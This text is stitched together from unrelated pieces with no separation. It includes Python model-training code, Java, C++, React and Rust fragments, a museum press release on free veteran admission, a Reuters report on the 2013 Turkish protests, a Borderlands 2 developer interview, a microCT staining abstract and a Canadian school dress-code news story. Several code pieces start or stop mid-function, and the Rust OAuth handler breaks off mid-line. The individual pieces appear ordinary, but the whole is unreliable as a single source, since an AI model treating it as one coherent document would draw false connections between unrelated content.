cls.PredParams.from_dict(pred_params) LOGGER.debug(f"TransformerMatcher train_params: {train_params.to_dict()}") LOGGER.debug(f"TransformerMatcher pred_params: {pred_params.to_dict()}") # save to a temp dir if not given if not train_params.model_dir: temp_dir = tempfile.TemporaryDirectory() train_params.model_dir = temp_dir.name if train_params.init_model_dir: matcher = cls.load(train_params.init_model_dir) if prob.Y.shape[1] != matcher.nr_labels: LOGGER.warning( f"Got mismatch nr_labels (expected {prob.Y.shape[1]} but got {matcher.nr_labels}), text_model reinitialized!" ) matcher.text_model = TransformerLinearXMCHead( matcher.text_encoder.config.hidden_size, prob.Y.shape[1] ) matcher.text_encoder.config.num_labels = prob.Y.shape[1] else: matcher = cls.download_model( train_params.model_shortcut, prob.Y.shape[1], hidden_dropout_prob=train_params.hidden_dropout_prob, cache_dir=train_params.cache_dir, ) LOGGER.info("Downloaded {} model from s3.".format(train_params.model_shortcut)) # assign clusters and train/pred params matcher.C = prob.C matcher.train_params = train_params matcher.pred_params = pred_params # tokenize X_text if X_text is given as raw text saved_trn_pt = train_params.saved_trn_pt if not prob.is_tokenized: if saved_trn_pt and os.path.isfile(saved_trn_pt): trn_tensors = torch.load(saved_trn_pt) LOGGER.info("trn tensors loaded_from {}".format(saved_trn_pt)) else: trn_tensors = matcher.text_to_tensor( prob.X_text, num_workers=train_params.batch_gen_workers, max_length=pred_params.truncate_length, ) if saved_trn_pt: torch.save(trn_tensors, saved_trn_pt) LOGGER.info("trn tensors saved to {}".format(saved_trn_pt)) prob.X_text = trn_tensors if val_prob is not None and not val_prob.is_tokenized: saved_val_pt = train_params.saved_val_pt if saved_val_pt and os.path.isfile(saved_val_pt): val_tensors = torch.load(saved_val_pt) LOGGER.info("val tensors loaded from {}".format(saved_val_pt)) else: val_tensors = matcher.text_to_tensor( val_prob.X_text, num_workers=train_params.batch_gen_workers, max_length=pred_params.truncate_length, ) if saved_val_pt: torch.save(val_tensors, saved_val_pt) LOGGER.info("val tensors saved to {}".format(saved_val_pt)) val_prob.X_text = val_tensors bootstrapping = kwargs.get("bootstrapping", None) if train_params.bootstrap_method is not None and bootstrapping is not None: init_encoder, init_embeddings, prev_head = bootstrapping matcher.text_encoder.init_from(init_encoder) LOGGER.info("Initialized transformer text_encoder form given text_encoder!") if train_params.bootstrap_method == "linear" and init_embeddings is not None: bootstrap_prob = MLProblem( init_embeddings, prob.Y, C=prob.C if prob.M is not None else None, M=prob.M, R=prob.Y if "weighted" in train_params.loss_function else None, ) matcher.text_model.bootstrap(bootstrap_prob) LOGGER.info("Initialized transformer text_model with xlinear!") elif train_params.bootstrap_method == "inherit": matcher.text_model.inherit(prev_head, prob.C) LOGGER.info("Initialized transformer text_model form parent layer!") # move matcher to desired hardware device, n_gpu = torch_util.setup_device(not train_params.disable_gpu) matcher.to_device(device, n_gpu) train_params.batch_size *= max(1, n_gpu) # train the matcher if not train_params.no_fine_tune and ( train_params.max_steps > 0 or train_params.num_train_epochs > 0 ): LOGGER.info("Start fine-tuning transformer matcher...") matcher.fine_tune_encoder(prob, val_prob=val_prob, val_csr_codes=val_csr_codes) if os.path.exists(train_params.model_dir): LOGGER.info("Reload the best checkpoint from {}".format(train_params.model_dir)) matcher = TransformerMatcher.load(train_params.model_dir) matcher.to_device(device, n_gpu) # ignore concat_model even if there exist one matcher.concat_model = None # getting the instance embeddings of training data # since X_feat is not passed, transformer-only result is produced P_trn, inst_embeddings = matcher.predict( prob.X_text, csr_codes=csr_codes, pred_params=pred_params, batch_size=train_params.batch_size, batch_gen_workers=train_params.batch_gen_workers, ) if pred_params.ensemble_method not in ["transformer-only"]: # train the same layer concat_model with current embedding LOGGER.info("Concatenating instance embeddings with features...") normed_embeddings = sk_normalize(inst_embeddings, axis=1, copy=True) if isinstance(prob.X, smat.csr_matrix): normed_embeddings = smat_util.dense_to_csr(normed_embeddings) cat_embeddings = smat_util.hstack_csr([prob.X, normed_embeddings], dtype=np.float32) else: cat_embeddings = np.hstack([prob.X, normed_embeddings]) LOGGER.info("Start training concat_model of transformer matcher...") lprob = MLProblem( cat_embeddings, prob.Y, C=prob.C if prob.M is not None else None, M=prob.M, R=sk_normalize(prob.Y, norm="l1") if "weighted" in train_params.loss_function else None, ) matcher.concat_model = MLModel.train(lprob, threshold=train_params.threshold) matcher.save(train_params.model_dir) # P_trn with concat_model concat_P_trn = matcher.concat_model.predict( lprob.X, csr_codes=csr_codes, only_topk=pred_params.only_topk, post_processor=pred_params.post_processor, ) P_trn = TransformerMatcher.ensemble_prediction( P_trn, concat_P_trn, pred_params.only_topk, pred_params.ensemble_method, ) P_val, val_inst_embeddings = None, None if val_prob is not None: P_val, val_inst_embeddings = matcher.predict( val_prob.X_text, X_feat=val_prob.X, csr_codes=val_csr_codes, batch_size=train_params.batch_size, batch_gen_workers=train_params.batch_gen_workers, ) LOGGER.info("*************** Final Evaluation ***************") # compute precision on test set val_type = "man" if val_csr_codes is not None else "all" val_metrics = smat_util.Metrics.generate(val_prob.Y, P_val, topk=pred_params.only_topk) avr_val_beam = ( 1 if val_csr_codes is None else val_csr_codes.nnz / val_csr_codes.shape[0] ) LOGGER.debug("avr_beam={}".format(avr_val_beam)) LOGGER.info( "| {} test-prec {}".format( val_type, " ".join("{:4.2f}".format(100 * v) for v in val_metrics.prec), ) ) LOGGER.info( "| {} test-recl {}".format( val_type, " ".join("{:4.2f}".format(100 * v) for v in val_metrics.recall), ) ) LOGGER.info("*" * 72) if train_params.save_emb_dir: smat_util.save_matrix( os.path.join(train_params.save_emb_dir, "X.trn.npy"), inst_embeddings, ) if val_inst_embeddings is not None: smat_util.save_matrix( os.path.join(train_params.save_emb_dir, "X.val.npy"), val_inst_embeddings, ) LOGGER.info(f"Instance embeddings saved to {train_params.save_emb_dir}") matcher.clear_cuda() if kwargs.get("return_dict", False): return { "matcher": matcher, "trn_pred": P_trn, "val_pred": P_val, "trn_embeddings": inst_embeddings, "val_embeddings": val_inst_embeddings, } else: return matcher
def _read_file(cls, path, filter_n_rx=True): my_reader = IWLBeamformReader() csi_data = my_reader.read_file(path) csi_entries = [] if filter_n_rx: csi_entries = [ frame for frame in csi_data.frames if frame.n_rx == 3] else: csi_entries = csi_data.frames return csi_entries
Free Museum Admission for Veterans, Active Military, and Family Members FREE MUSEUM ADMISSION FOR VETERANS, ACTIVE MILITARY BEGINS ON MEMORIAL DAY Veterans, Active Military free all summer long Milwaukee, Wis. – The Milwaukee Art Museum is offering free admission for all veterans, active military, and up to five additional family members beginning on Monday, May 27 (Memorial Day) and running through Monday, September 2 (Labor Day). Currently on view is The Veterans Book Project: Objects for Deployment, which highlights the stories of veterans from throughout the country, including five local veterans and their families. In continuing the Museum’s partnership with the Milwaukee County War Memorial, all veterans and up to five family members with them receive free admission throughout the run of the exhibition. This summer, the Museum is again participating in the Blue Star Museums program, where active military and up to five family members with them receive free Museum admission from Memorial Day through Labor Day. First launched in 2010, Blue Star Museums is a collaboration among the National Endowment for the Arts, Blue Star Families, the Department of Defense, and more than 2,000 museums across America. Starting Memorial Day (May 27) and running through Labor Day (Sept 2), the Museum is open seven days a week, 10 a.m. to 5 p.m. (until 8 p.m. on Thursdays). The Museum’s summer feature exhibition, 30 Americans, opens June 14. ABOUT MILWAUKEE ART MUSEUM Celebrating its 125th anniversary in 2013, the Milwaukee Art Museum houses a rich collection of over 30,000 works, with strengths in 19th- and 20th-century American and European art, contemporary art, American decorative arts, and folk and self-taught art. The Museum campus is located on the shores of Lake Michigan and spans three buildings, including the Santiago Calatrava-designed Quadracci Pavilion and the Eero Saarinen-designed Milwaukee County War Memorial Center. For more information, please visit www.mam.org. ###
/** Bind to the Events Manager Service */ private void bindToEventsManagerService() { Log.d(LOG_TAG, "Binding to Events Manager Service..."); Intent serviceIntent = new Intent(SERVICE_ACTION); bindService(serviceIntent, serviceConnection, Context.BIND_AUTO_CREATE); }
<filename>zxl_exchange_microservice/zxl_framework_wallet_base/src/main/java/com/whoiszxl/wallet/base/dao/UserAddressDao.java package com.whoiszxl.wallet.base.dao; import com.whoiszxl.wallet.base.pojo.ZxlUserAddress; import org.springframework.data.jpa.repository.JpaRepository; import org.springframework.data.jpa.repository.JpaSpecificationExecutor; /** * @description: useraddress dao层 * @author: whoiszxl * @create: 2019-08-16 **/ public interface UserAddressDao extends JpaRepository<ZxlUserAddress, String>,JpaSpecificationExecutor<ZxlUserAddress> { ZxlUserAddress findByUserIdAndCurrencyIdAndStatus(String userId, Integer currencyId, Integer status); ZxlUserAddress findByCurrencyIdAndRechargeAddressAndStatus(Integer currencyId, String rechargeAddress, Integer status); }
#pragma once #include <QJsonObject> #include <memory> #include <game/board/field.h> class FieldFactory { FieldFactory() = delete; public: static std::unique_ptr<Field> create(const QJsonObject& specification); protected: static std::unique_ptr<Field> createStreet(const QJsonObject& specification); static std::unique_ptr<Field> createUtility(const QJsonObject& specification); };
//! Probability of at least N events class ProbabilityOfAtLeastNEvents { public: explicit ProbabilityOfAtLeastNEvents (int n) : n_(n) {} Real operator()(std::vector<Real> p) const; private: Size n_; }
<filename>src/index.tsx import * as React from "react"; import * as ReactDOM from "react-dom"; import InputPlayers from "./pages/input_players"; import ChooseCard from "./pages/choose_card"; import Challenge from "./pages/challenge"; import Result from "./pages/result"; import initState from "./state"; const Index = () => { const [state, setState] = React.useState(initState); if (state.mode == "inputPlayers") { return <InputPlayers state={state} setState={setState} />; } else if(state.mode == "chooseCard") { return <ChooseCard state={state} setState={setState} />; } else if(state.mode == "challenge") { return <Challenge state={state} setState={setState} />; } else if(state.mode == "result") { return <Result state={state} />; } else { return <h1>internal server error</h1>; } }; ReactDOM.render(<Index />, document.getElementById("react"));
import { State, Action, StateContext } from '@ngxs/store'; import { Reminder } from 'src/app/_shared/models/reminder'; import { SelectDay, SelectReminder, RefreshReminder } from './actions'; export interface DateModel { day: Date; } export interface ReminderModel { reminder: Reminder; } @State<DateModel>({ name: 'day', defaults: { day: null } }) export class DayState { @Action(SelectDay) setDate(ctx: StateContext<DateModel>, action: SelectDay) { const state = ctx.getState(); ctx.setState({ ...state, day: action.day }); } } @State<ReminderModel>({ name: 'reminder', defaults: { reminder: null } }) export class EventState { @Action(SelectReminder) setDate(ctx: StateContext<ReminderModel>, action: SelectReminder) { const state = ctx.getState(); ctx.setState({ ...state, reminder: action.reminder }); } }
Using different iodine staining for morphological analysis from microCT images in muscle structure of wistar rats The aim of this study was to evaluate the effect of concentration and staining duration of iodine contrast applied to study the masticatory muscle of Wistar rats in microCT images. The iodine contrast was applied with 3%, 5% and 10%, during 7, 15 and 30 days. The contrast with 10% presented the better results, in general..
ISTANBUL/ANKARA (Reuters) - Turkish demonstrators demanded the sacking of police chiefs on Wednesday over a fierce crackdown on days of unprecedented protest against what they see as Prime Minister Tayyip Erdogan’s authoritarian rule. A delegation of activists met Deputy Prime Minister Bulent Arinc at his office in Ankara and demanded the release of detained demonstrators, a halt to the police use of tear gas, and the removal of senior officers who oversaw the crackdown. Arinc, formally in charge of government while Erdogan is on an official visit to North Africa, has apologized for “excessive violence” by police against the initial protest in Istanbul’s Taksim Square but made no public comment after the meeting. Police use of tear gas and water cannon to disperse that initial demonstration last week triggered the most violent riots in decades and drew other groups, from professionals to students, into a broadening protest against Erdogan. Two people have been killed and more than 3,000 injured in the six days of unrest, dealing a blow to the prime minister’s image at home and abroad. Members of more than a dozen labor unions banging drums, trailing banners and chanting “Tayyip resign” marched into Taksim, where the demonstrations have been largely peaceful in recent days after riot police withdrew. There were similar scenes in Kizilay park, the heart of Ankara’s government district, where police fired pepper spray and water cannons in a bid to disperse around 2,000 protesters. Critics accuse Erdogan of inflaming the situation over the weekend by describing protesters in blanket terms as looters, and later associating them with terrorism. Since Erdogan left on Monday, Arinc has struck a more conciliatory tone. Related Coverage Diverse Turkey protesters vent anger, little agreement on alternative But Arinc refuses to talk to unnamed groups he accuses of exploiting anger over the police action against the original protest to foment violence. Youths, some affiliated to radical left wing groups, have pulled up paving stones and smashed windows in successive nights. The softening in tone from the AK Party (AKP) government appeared too little and too late to halt the protests. “We will show that we will not surrender to AKP fascism with our peaceful democratic reaction in city squares,” said a joint statement from two union confederations. “The AKP is trying to cow a significant portion of society to realize its own dreams of power, restricting rights and freedoms.” U.S. CONCERN Erdogan, who has a huge parliamentary majority, did not comment on domestic matters at a news conference in Algiers on Tuesday. A man who rarely bows to any opposition, he clearly has no intention of stepping down and no obvious rivals inside or outside his AK party. U.S. Vice President Joe Biden, reflecting concern about stability in a NATO ally in the Middle East, urged the Turkish government to respect the rights of political opponents. “Today’s Turkey has a chance to demonstrate that there’s no need to choose between economic advancement and democracy, the system that empowers the winners of elections and yet protects those whose who are in opposition,” Biden said. A Turkish diplomatic source said Foreign Minister Ahmet Davutoglu called U.S. Secretary of State John Kerry on Wednesday, telling him Turkey was not a second-class democracy and referring to the Occupy Wall Street protests of 2011, when New York police raided a park to flush out campaigners. An anti-government protester falls to the ground as the police disperse the crowd with water cannons during a protest in Ankara June 5, 2013. REUTERS/Umit Bektas The United States has held up Erdogan’s Turkey as an example of an Islamic democracy that could be imitated throughout the Middle East. But domestic opponents argue that, for all the economic advances under Erdogan and early democratic reform, events have recently taken a more authoritarian turn. They also accuse him of pursuing an “Islamist” agenda by easing restrictions on the wearing of headscarves - a symbol of female Islamic piety - in state institutions, limiting alcohol sales and promoting broader religious projects. Erdogan denies any ambition to undermine Turkey’s secular constitution. Hackers calling themselves “Anonymous Turkey” said they had attacked government systems and obtained confidential details of staff in Erdogan’s office. A source in the prime ministry confirmed staff email accounts had come under a “phishing” attack to obtain confidential details but said those affected had been cut off from the network. On Taksim, thousands remained at a makeshift camp that is taking on the look of a more enduring settlement. Small tents have appeared, food and face masks against tear gas are on sale and a library is in the making. On a street off the square some protesters skirmished overnight with police who used tear gas. ERDOGAN’S POWER Erdogan’s return on Thursday to Turkey, a country laden with political tensions on its borders with both Syria and Iraq, could prove pivotal to the unrest. “The main concern for the moment is that the prime minister should hold his silence,” said one diplomat close to the administration. “Whatever he says seems to stir feelings.” In the western port city of Izmir, police raided 38 addresses and detained 25 people on suspicion of stirring insurrection on social media with comments on the protest, opposition CHP party deputy Alaattin Yuksel told Reuters. Police declined comment. Slideshow (18 Images) In a television interview this week, Erdogan described social media, including Twitter, as a “scourge”. But social media have taken on a particular importance as newspapers and television have come increasingly under the sway of government. Clashes spread overnight to the eastern province of Tunceli, where police fired tear gas and water cannon at hundreds of protesters who set up barricades and threw stones at them, witnesses said. Police intervened in a similar way against demonstrators in Ankara, as well as in Hatay province on the Syrian border where a 22-year-old man died after being hit in the head at a rally late on Monday.
Share For those familiar with the original Borderlands, arguably the one character that has the most iconic and lasting appeal is that of Claptrap, the robot—or robots—that populate the landscape of Pandora (Search your feelings Lilith fans, you know it to be true). They were there to offer quests, lead you to hidden items, and offer a bit of comic relief–before they decide to eliminate all of us puny human meat sacks in the DLC “Claptrap’s New Robot Revolution,” of course, but even then they tended to entertain while they ate organic justice and exploded with a satisfying “boom.” When the original Borderlands was released in 2009, many had high hopes for it, but few expected it to explode the way it did. Within the first two months of its release, the game had sold 2 million copies–a number that would classify it as a success. Two months later, it had sold another million, cementing it as a true hit. At last count, the game had recorded 4.5 million in sales, making it somewhat elite. So a sequel was not only welcome, but expected. And while the original game snuck up and surprised almost everyone (except maybe the developers Gearbox Software and publisher 2K Games), the sequel has some high expectations when it does NOT come out on July 20 (more on that later). When it does hit shelves, the game will feature several new upgrades, improvements, and a much bigger role for the sole remaining Claptrap. We talked with Gearbox President & CEO Randy Pitchford, Executive VP & Chief Creative Officer Brian Martel, Borderlands 2 Writer Anthony Burch, and Producer Matt Charles about what to expect from Claptrap, how the development between the original and sequel has changed, and how the industry as a whole is looking from Gearbox’s side of the fence. What can we expect from the Claptraps in Borderlands 2? [Anthony Birch, writer] You can expect all but one of them to be dead, for starters. The game opens with Claptrap – the very first one you met in BL1 – in the unenviable position of being the last of his kind. The Hyperion Corporation ordered the extermination of the entire CL4P-TP product line, and our Claptrap is hungry for revenge against his creators. He’s kind of like Rutger Hauer’s in Blade Runner, only minus the bleached blonde hair, moral ambiguity, and sex appeal. How will the events of the “Robot Revolution” DLC shade the story of Borderlands 2? [AB] You won’t need to have played the Robot Revolution DLC to understand Claptrap’s place in Borderlands 2, but it certainly doesn’t hurt. Hyperion ordered the extermination of the CL4P-TP line as an answer to the events of the robot revolution. That, and because Handsome Jack, the head of Hyperion, thinks dancing robots are a waste of money. What was the inspiration for the design of the Claptrap units? [Brian Martel] Claptrap actually originated from one of our tasks in another title we were developing. One of our concept artists, Lorin Wood, posted a quick sketch of him in the task as a joke. We thought it would be awesome to have a one wheel talking robot in Borderlands and he riffed on the concept some more and out came our funny talking robot! Growing up, what were some of your favorite robots in fiction, and why? [AB] I loved the robot from Lost in Space. The, uh, movie. The one with Matt LeBlanc as a badass space pilot. May I one day be forgiven. Do you follow real world robotics? How do you see the health of that industry? [BM] We occasionally do. We always make an effort to stay up to date on technology of all varieties. Sometimes we use that technology as inspiration for art within our own titles. We do hope the robotic industry takes off. Who doesn’t want to have their breakfast made by a personal robot every morning?!?! Can we expect to see Claptrap as an ally in combat? [AB] I’m going to reinterpret your question slightly and assume that by “friendly AI who helps you out in combat,” you meant, “amusing but ultimately powerless sidekick who praises your combat performance with his characteristically endearing and/or annoying cadence.” In which case: yes. We totally have that. How has the AI design changed from the original game to the sequel? [AB] Like pretty much everything else in the game, the AI has undergone a massive improvement since the first game. Enemies now have much more complex interactions with one another. Our robotic enemies will heal one another, players can trick our bandit enemies into fighting amongst themselves, and our elemental creatures are off the chizzo, for rizzo. Like, say you’re fighting a Fire Skag. He’s immune to fire damage, shoots fire at you, the whole deal. But midway during your fight, some non-elemental Skag Pups come in to help him. Suddenly, the Fire Skag roars, sending out a fiery AoE blast that transforms all of the Skag Pups into Fire Skag Pups, with the same elemental strengths he had. Any news on a firm release date? Is the tentative date of July 30 looking good? [Matt Charles] We haven’t announced a ‘tentative’ date. Nice try, though. :) [Worth a try…] What are the things you are most excited for people to see and experience when they play Borderlands 2? [AB] In short: the guns. With the entire gun system rebuilt from the ground up, I’m really interested to see which guns the fans respond to — will they prefer the bullet hose Vladofs? The precise, sci-fi Hyperion weapons? The Tediore guns, which you throw like grenades instead of reloading? Personally, I can’t wait to see someone kill the endboss just by throwing Tediore reloads at it. What games are and have influenced your style as a developer? What about as a fan of playing games? [AB] Personally, as a writer? Everything by Valve Software or Irrational Games. Those guys know exactly how to successfully tell linear stories that respect the player’s agency and immersion. How do you see the health of the gaming industry in general? [Randy Pitchford] In sum, the game industry is stronger than ever. The best of the premium game makers are reaching more people than ever before and entirely new markets have opened up with casual games, digital distribution and mobile gaming over the last few years and all of this adds up to a very exciting climate for creators. Where do you see the industry going in the next few years/decades? [RP] It’s really exciting how technology is not only enabling us to deliver better looking and more immersive experiences, but more connected and convenient experiences as well. I expect we’ll continue to see growth in premium games for the major consoles especially as new console platforms appear. Do you think the industry is starting to get the mainstream respect it deserves, or is it still a bit niche? [RP] Games are definitely mainstream at this point. There are still one or two generations of non-gamers behind us, but everyone coming in – the people that are in front of future culture – are all gamers. To us, gaming isn’t niche or main-stream, it’s an entertainment option as relevant as or even more relevant than music, film, television or print.
#pragma once #include "./Marquardt1.hpp" #include "./Marquardt2.hpp"
def _on_train_end(self): self.train_end = timeit.default_timer() print('Training took {} seconds'.format(self.train_end - self.train_start))
/********************************************************** * 500 page. * * @author <NAME> <<EMAIL>> * @version 1.0.0 * * Copyright (C) 2021 hello-slide **********************************************************/ import Title from '../components/common/Title'; import InternalServerErrorPage from '../components/error/InternalServerErrorPage'; const InternalServerError = () => { return ( <> <Title title="500" /> <InternalServerErrorPage /> </> ); }; export default InternalServerError;
/** * * @author Robert Gruendler <[email protected]> * */ @SuppressWarnings("restriction") public class PackagistItem extends AbstractDiscoveryItem<PackageFilterItem> { private MinimalPackage item; private Label nameLabel; private Label description; private Button downloadButton; private final PackageFilterItem filterItem; private Button favorButton; private Combo versionCombo; private boolean isLoadingVersions = false; private List<PackageFilterChangedListener> listeners = new ArrayList<PackageFilterChangedListener>(); public PackagistItem(Composite parent, int style, DiscoveryResources resources, PackageFilterItem element) { super(parent, style, resources, element); this.filterItem = element; this.item = element.getPackage(); createContent(); } @Override protected void refresh() { } private void createContent() { GridLayout layout = new GridLayout(3, false); layout.marginLeft = 7; layout.marginTop = 2; layout.marginBottom = 2; setLayout(layout); nameLabel = new Label(this, SWT.NONE); GridDataFactory.fillDefaults().grab(true, false).span(3,1).align(SWT.BEGINNING, SWT.CENTER).applyTo(nameLabel); nameLabel.setFont(resources.getSmallHeaderFont()); nameLabel.setText(item.getName()); description = new Label(this, SWT.NULL | SWT.WRAP); GridDataFactory.fillDefaults().grab(true, false).span(3, 1)/*.indent(45, 0).hint(100, SWT.DEFAULT)*/.applyTo(description); String descriptionText = item.getDescription(); int maxDescriptionLength = 162; if (descriptionText == null) { descriptionText = ""; //$NON-NLS-1$ } if (descriptionText.length() > maxDescriptionLength) { descriptionText = descriptionText.substring(0, maxDescriptionLength); } description.setText(descriptionText.replaceAll("(\\r\\n)|\\n|\\r", " ")); //$NON-NLS-1$ //$NON-NLS-2$ createStatsPart(); initializeListeners(); initState(); } protected void initState() { if (filterItem.isChecked()) { setBackground(resources.getGradientEndColor()); if (filterItem.getVersions() != null) { loadVersionsFromCache(); } else { loadVersionCombo(); } } else { versionCombo.setVisible(false); } } protected void createStatsPart() { favorButton = new Button(this, SWT.PUSH); favorButton.setToolTipText("Favorites on packagist.org"); favorButton.setLayoutData(new GridData(SWT.LEFT, SWT.CENTER, false, false)); favorButton.setImage(ComposerUIPluginImages.STAR.createImage()); GridDataFactory.swtDefaults().align(SWT.CENTER, SWT.CENTER).span(1, 2).applyTo(favorButton); downloadButton = new Button(this, SWT.TOGGLE); downloadButton.setToolTipText("Select this package for your new project."); if (filterItem.isChecked()) { downloadButton.setSelection(true); } GridDataFactory.swtDefaults().align(SWT.BEGINNING, SWT.CENTER).span(1, 2).applyTo(downloadButton); JsonValue downloads = item.get("downloads"); JsonValue favorites = item.get("favers"); if (downloads != null && favorites != null) { Number number = downloads.getAsNumber(); DecimalFormat formatter = (DecimalFormat) NumberFormat.getInstance(new Locale("en_US")); DecimalFormatSymbols symbols = formatter.getDecimalFormatSymbols(); symbols.setGroupingSeparator(' '); downloadButton.setText(formatter.format(number)); downloadButton.setImage(ComposerUIPluginImages.DOWNLOAD.createImage()); favorButton.setText("" + favorites.getAsNumber()); } versionCombo = new Combo(this, SWT.READ_ONLY); GridDataFactory.fillDefaults().align(SWT.END, SWT.CENTER).span(1, 2).hint(200, SWT.DEFAULT).applyTo(versionCombo); } protected void initializeListeners() { downloadButton.addSelectionListener(new SelectionAdapter() { public void widgetSelected(SelectionEvent e) { boolean selected = downloadButton.getSelection(); filterItem.setChecked(selected); for (PackageFilterChangedListener listener : listeners) { listener.filterChanged(filterItem); } } }); favorButton.addSelectionListener(new SelectionAdapter() { @Override public void widgetSelected(SelectionEvent e) { try { final IWebBrowser browser = PlatformUI.getWorkbench().getBrowserSupport().createBrowser(null); browser.openURL(new URL(item.getAsString("url"))); } catch (Exception e1) { Logger.logException(e1); } } }); versionCombo.addSelectionListener(new SelectionAdapter() { @Override public void widgetSelected(SelectionEvent e) { filterItem.setSelectedVersion(versionCombo.getText()); for (PackageFilterChangedListener listener : listeners) { listener.filterChanged(filterItem); } } }); } protected void loadVersionsFromCache() { versionCombo.setItems(filterItem.getVersions()); versionCombo.select(0); versionCombo.setVisible(true); filterItem.setSelectedVersion(versionCombo.getText()); for (PackageFilterChangedListener listener : listeners) { listener.filterChanged(filterItem); } } protected void loadVersionCombo() { versionCombo.setItems(new String[]{"Loading versions..."}); versionCombo.select(0); AsyncPackagistDownloader dl = new AsyncPackagistDownloader(); dl.addPackageListener(new PackageListenerInterface() { @Override public void errorOccured(Exception e) { isLoadingVersions = false; } @Override public void aborted(String url) { isLoadingVersions = false; } @Override public void packageLoaded(RepositoryPackage repositoryPackage) { Versions versions = repositoryPackage.getVersions(); final List<String> versionNames = new ArrayList<String>(); for (Entry<String, ComposerPackage> version : versions) { versionNames.add(version.getValue().getVersion()); } getDisplay().asyncExec(new Runnable() { @Override public void run() { filterItem.setVersions(versionNames.toArray(new String[versionNames.size()])); loadVersionsFromCache(); } }); isLoadingVersions = false; } }); dl.loadPackage(item.getName()); isLoadingVersions = true; } public void addFilterChangedListener(PackageFilterChangedListener listener) { if (!listeners.contains(listener)) { listeners.add(listener); } } }
Amid the uproar across Canada over student dress codes, school administrators came to the defence of such rules on Wednesday, saying they are not meant to stifle creativity or be sexist. Standards are needed for safety reasons and to prevent clothes from becoming a distraction in the classroom, officials said. Such rules also prepare students for the working world. “Principals are doing their very best to ensure they are providing a policy that tries to account for both social growth and movement and traditional values that people hold near and dear,” said Tina Estabrooks, president of the Canadian Association of Principals and the principal of an elementary school in Saint John, N.B. Dress code policies have become a flashpoint in school districts in Ontario and the Maritimes in recent weeks. Dozens of students at A.B. Lucas Secondary School in London, Ont., rallied Wednesday in support of Grade 12 student Laura Anderson, who was sent home earlier this week after wearing a loose-fitting, sleeveless top and ripped jeans to school. An online petition said the school’s dress code is premised on the “outdated” notion that female students should “cover up” because they could distract male students. “The sexualization of a teenage girl’s body is not her problem, it is the problem of those who choose to sexualize a 17-year-old’s body,” the petition said. Sheila Powell, superintendent at the Thames Valley School District, said that part of the reason Anderson’s attire was deemed inappropriate was because an undergarment was showing. While educators are not trying to be the fashion police and want students to express themselves, students also have to learn there are limits, Powell said. The rules aren’t just addressing clothes that are too revealing but clothes that might contain racist or hateful language. Most workplaces have such expectations, she said. On Tuesday, scores of students showed up at the Etobicoke School of the Arts in Toronto wearing midriff-baring crop tops in support of Alexi Halket, 18, who was called to the principal’s office for wearing a grey skirt and black and turquoise top that resembled a sports bra. “First of all, what’s wrong with a sports bra?” Halket wrote on Facebook. “It does its job of covering boobs, and why is SKIN perceived as ‘inappropriate.’ That only means that it’s seen as sexual or provocative, and teachers shouldn’t be making those observations about students.” Earlier this month, Lauren Wiggins, 17, a student at Harrison Trimble High School in Moncton, N.B., took to social media after officials deemed the full-length halter dress she was wearing — which revealed her shoulders, upper back tattoo and bra strap — to be inappropriate. “Enough is enough. I’m tired of the unjust standards that we as women are held up to,” Wiggins wrote on Facebook. Last year, Kate Winn, an Ontario Catholic elementary school teacher and mother behind the This Mom Loves blog, wrote that she explained to her students that “it demonstrates modesty” to have certain body parts covered up more than others. “Do parents fight (the) fact that Tim Hortons has the nerve to tell their child what to wear?” Janet Foord, president of the Canadian School Boards Association, said some school officials have dress codes to address disparities between students. “There’s always competition with kids with clothing. It’s a status thing,” Foord said. “Having a dress code brings some equity for families in poverty situations.” But the opposition is growing louder. Whereas students may have grumbled quietly in the past, we’re now seeing a surge in political activism, likely the result of high-profile cases surrounding sexual harassment and gender discrimination, said Shauna Pomerantz, a professor of child and youth studies at Brock University. Pomerantz said the language in dress codes can be insulting to young women because they suggest they are “asking for it” and unable to think for themselves. They’re also insulting to young men because they suggest they have no control over their “raging hormones.” If schools want to address problems surrounding sexual harassment, then have a frank discussion about respecting bodies, she said. “If you ask me, high school is not only a place of learning, but a place to experiment with identity.” National Post • Email: [email protected] | Twitter: dougquan
use super::OauthError; use crate::core::{error::AppError, AppState}; use actix_session::Session; use actix_web::http::header::LOCATION; use actix_web::http::StatusCode; use actix_web::web::{Data, Form, Query}; use actix_web::Error; use actix_web::{HttpResponse, Responder, Result}; use std::collections::HashSet; /// GET /authorize pub async fn auth_get((data, state, session): (Query<AuthParams>, Data<AppState>, Session)) -> impl Responder { handle_auth(&data, &state, &session) } /// POST /authorize pub async fn auth_post((data, state, session): (Form<AuthParams>, Data<AppState>, Session)) -> impl Responder { handle_auth(&data, &state, &session) } // common ground fn handle_auth(data: &AuthParams, state: &Data<AppState>, session: &Session) -> Result<HttpResponse> { info!("auth({:?})", data); session.clear(); match validate_auth(data, state)? { Some(e) => Ok(HttpResponse::Found() .header(LOCATION, callback_error(data, e)?) .finish()), None => { set_on_session(data, session)?; state.send_page(StatusCode::OK, "login.html", tera::Context::new()) } } } // @see https://openid.net/specs/openid-connect-core-1_0.html#AuthRequest #[derive(Deserialize, Debug, Clone)] pub struct AuthParams { pub scope: Option<String>, pub response_type: Option<String>, pub client_id: Option<String>, pub redirect_uri: Option<String>, pub state: Option<String>, // RECOMMENDED pub response_mode: Option<String>, pub nonce: Option<String>, pub display: Option<String>, pub prompt: Option<String>, pub max_age: Option<String>, pub ui_locales: Option<String>, pub id_token_hint: Option<String>, pub login_hint: Option<String>, pub acr_values: Option<String>, } /// validates, extracts the info & puts it on the session /// https://openid.net/specs/openid-connect-core-1_0.html#AuthError fn validate_auth(data: &AuthParams, state: &AppState) -> Result<Option<OauthError>, AppError> { if data.redirect_uri.is_none() { return Err(AppError::bad_req("'redirect_uri' is required")); } let redirect_uri = data.redirect_uri.as_ref().unwrap(); if redirect_uri.is_empty() { return Err(AppError::bad_req("'redirect_uri' is required")); } if data.response_type.is_none() { return Ok(Some(OauthError::new("invalid_request", "response_type is required."))); } let response_type = data.response_type.as_ref().unwrap(); if !contains(&RESPONSE_TYPES, response_type.as_ref()) { //if !RESPONSE_TYPES.iter().any(|x| x == &data.response_type) { return Ok(Some(OauthError::new("invalid_request", "invalid 'response_type'"))); } if response_type != "code" { return Ok(Some(OauthError::of("unsupported_response_type"))); // TODO } // TODO is responsy_tpe allowed for client? if data.client_id.is_none() { return Ok(Some(OauthError::new("invalid_request", "'client_id' is required"))); } let client_id = data.client_id.as_ref().unwrap(); let client = state .oauth_db .fetch_client_config(&client_id) .map_err(|_| AppError::bad_req("Unknown or invalid client_id "))?; let callback_urls = 